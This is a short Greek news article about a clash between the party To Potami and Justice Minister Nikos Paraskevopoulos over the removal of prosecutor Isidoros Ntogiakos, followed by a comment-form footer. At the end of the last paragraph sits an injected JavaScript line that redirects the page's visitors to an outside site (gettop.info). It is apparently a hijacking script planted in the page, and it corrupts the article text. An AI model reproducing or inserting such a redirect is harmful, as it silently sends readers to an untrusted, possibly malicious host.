Κόντρα Ποταμιού-Παρασκευόπουλου για τον Ντογιάκο

0
8

Η αρχή της κόντρας ανάμεσα στο Ποτάμι και τον υπουργό Δικαιοσύνης έγινε,καθώς μόλις έγινε γνωστή η απόφαση για την απομάκρυνση του Ισίδωρου Ντογιάκου από την Εισαγγελία Εφετών το Ποτάμι, ανέφερε ότι «τελικά η Πρόεδρος του Αρείου Πάγου και ο υπουργός Δικαιοσύνης, πέτυχαν αυτό που επεδίωκαν: την έκπτωση του Ισίδωρου Ντογιάκου από τη θέση του Προϊσταμένου της Εισαγγελίας Εφετών Αθηνών. Αγνόησαν έτσι πλήρως την γνώμη των συναδέλφων του εισαγγελέων που προ ημερών τον ανέδειξαν σε αυτό το αξίωμα μετά από άδεια που είχε δώσει στον κ.Ντογιάκο ο Άρειος Πάγος για να κατέλθει στις εκλογές.

Το Ποτάμι επίσης σημείωσε ότι «η ενέργεια αυτή έρχεται να προστεθεί σε σειρά κρουσμάτων, με τελευταίο όσα συνέβησαν στο ΣτΕ, που δείχνουν ότι δημιουργείται μια άκρως προβληματική κατάσταση στο χώρο της Δικαιοσύνης με ευθύνη της ηγεσίας της και της κυβέρνησης. Οι καθεστωτικές αντιλήψεις των ΣΥΡΙΖΑΝΕΛ που εκδηλώνονται όλο και συχνότερα, υπονομεύουν ένα από τους βασικούς πυλώνες της δημοκρατίας».

Ως απάντηση στη συγκεκριμένη ανακοίνωση ο Νίκος Παρασκευόπουλος τη χαρακτήρισε ως «δείγμα αθεράπευτης υποτίμησης των αρμόδιων οργάνων της ανεξάρτητης Δικαιοσύνης».

Αναλυτικότερα, ο κ. Παρασκευόπουλος σημείωσε ότι «το «Ποτάμι» επιμένει να «χρεώνει» στον υπουργό Δικαιοσύνης και στην πρόεδρο του Αρείου Πάγου μια πειθαρχική απόφαση που λήφθηκε από το αρμόδιο ανώτατο πειθαρχικό συμβούλιο το οποίο απαρτίζεται από δικαστές οριζόμενους με κλήρωση. Πρόκειται για ανακοίνωση-δείγμα αθεράπευτης υποτίμησης των αρμόδιων οργάνων της ανεξάρτητης Δικαιοσύνης. Τα δικαστικά όργανα, άλλωστε, δεν λειτουργούν με επιδιώξεις αλλά εφαρμόζοντας κανόνες». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here